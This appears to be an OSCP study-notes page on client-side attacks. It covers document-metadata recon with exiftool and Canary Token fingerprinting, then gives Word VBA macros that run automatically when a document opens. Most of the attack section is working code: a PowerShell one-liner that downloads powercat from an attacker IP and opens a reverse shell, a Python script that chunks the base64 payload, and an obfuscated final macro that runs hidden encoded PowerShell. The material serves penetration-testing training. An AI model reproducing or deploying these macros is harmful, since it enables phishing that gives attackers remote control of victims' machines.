> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/cool/client-side-attacks.md).

# Client-side Attacks

```
exiftool -a -u quote.pdf
```

{% hint style="info" %}
Passive recon viewing metadata of publicly available documents to view potential installed software on the target machine
{% endhint %}

#### Use Canary Tokens to fingerprint the remote machine&#x20;

{% embed url="<https://canarytokens.org/generate>" %}

#### Macros in Word documents

{% hint style="info" %}
Save as .doc (Word 97-2003 Document)
{% endhint %}

#### Open powershell

<pre><code>Sub AutoOpen()
<strong>    Mal
</strong>End Sub
Sub Document_Open()
    Mal
<strong>End Sub
</strong>Sub Mal()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub
</code></pre>

### Reverse shell macro

#### Encode in base64

```
echo "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.10/powercat.ps1');powercat -c 10.10.14.10 -p 1337 -e powershell" | base64
```

#### Python script to break ouput into smaller chunks

```
str = "powershell.exe -nop -w hidden -e <base64 output>"
n = 50
for i in range(0, len(str), n):
print("Str = Str + " + '"' + str[i:i+n] + '"')
```

#### Final Macro script

<pre><code>Sub AutoOpen()
    MyMacro
End Sub
Sub Document_Open()
<strong>    MyMacro
</strong>End Sub
Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
    Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
<strong>    Str = Str + "A== "
</strong>CreateObject("Wscript.Shell").Run St
</code></pre>

{% embed url="<https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba>" %}

{% embed url="<https://github.com/k4sth4/Creating-a-Malicious-doc>" %}
